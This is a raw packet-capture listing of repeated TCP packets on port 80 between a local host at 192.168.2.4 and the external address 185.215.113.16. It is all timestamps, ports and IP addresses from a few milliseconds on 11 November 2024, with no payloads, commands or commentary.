Nov 11, 2024 01:14:23.306674957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306687117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306699991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306715012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306737900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306822062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306834936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306844950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306855917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306866884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306866884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306879044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306895018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306896925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306910038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306921005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306921959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306932926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306935072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306945086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306955099 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.306957006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306969881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306982040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.306983948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307001114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307015896 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307029009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307034969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307044983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307054043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307056904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307064056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307070017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307080984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307091951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307091951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307097912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307104111 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307116032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307122946 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307127953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307140112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307151079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307157040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307167053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307178974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307183027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307190895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307202101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307213068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307213068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307219982 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307225943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307240963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307267904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307293892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307307005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307324886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307336092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307339907 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307348013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307359934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307363033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307370901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307384014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307393074 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307395935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307413101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307415009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307427883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307435036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307439089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307451010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307454109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307478905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307507038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307607889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307621002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307631016 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307641983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307651997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307653904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307662964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307665110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307676077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307686090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307688951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307698011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307708025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307712078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307727098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307734966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307743073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307754993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307765961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307768106 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307777882 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307785988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307789087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307801008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307811022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307815075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307825089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307837009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307841063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307848930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307848930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307876110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307882071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307893991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307903051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307905912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307918072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307928085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307929993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307940960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307952881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307957888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307969093 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.307970047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.307996035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308017015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308032990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308043957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308053970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308064938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308068991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308090925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308118105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308471918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308484077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308495045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308506012 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308516979 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308520079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308532953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308545113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308548927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308556080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308568954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308568954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308589935 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308604956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308609009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308624029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308635950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308645964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308657885 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308679104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308778048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308790922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308801889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308814049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308819056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308825970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308837891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308840990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308850050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308861017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308868885 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308872938 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308877945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308886051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308904886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308907986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308921099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308926105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308931112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308943987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308949947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.308955908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308969021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308979988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.308979988 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309011936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309031963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309036970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309047937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309058905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309071064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309075117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309094906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309113026 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309176922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309189081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309201002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309212923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309216022 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309225082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309226036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309238911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309252024 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309274912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309305906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309317112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309348106 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309371948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309478045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309490919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309520960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309531927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309633017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309643984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309659004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309669971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309673071 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309683084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309691906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309700966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309731960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309758902 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309772015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309782982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309794903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309801102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309807062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309811115 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309819937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309834957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309864044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309889078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309901953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309912920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309925079 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.309931040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309954882 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.309978962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310069084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310081959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310094118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310103893 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310106993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310121059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310129881 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310133934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310141087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310173035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310199976 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310213089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310223103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310234070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310245037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310245991 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310259104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310259104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310271978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310285091 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310316086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310338974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310352087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310379028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310404062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310497999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310509920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310520887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310532093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310544014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310551882 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310555935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310576916 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310586929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310611963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310655117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310812950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310825109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310836077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310847998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310856104 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310859919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310868979 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310873032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310884953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310895920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310899019 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310920000 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310923100 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310934067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310944080 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310954094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310966015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310969114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310977936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.310988903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.310991049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311000109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311007023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311022997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311028957 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311034918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311043978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311048031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311059952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311070919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311070919 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311084986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311103106 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311103106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311125994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311126947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311139107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311151028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311151028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311161995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311172962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311182022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311184883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311193943 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311206102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311208010 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311218023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311230898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311242104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311248064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311256886 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311259031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311271906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311284065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311288118 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311292887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311295033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311307907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311328888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311352968 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311402082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311413050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311423063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311444044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311469078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311536074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311547041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311557055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311567068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311578035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311579943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311589956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311593056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311619043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311645985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311680079 CET	80	49762	185.215.113.16	192.168.2.4
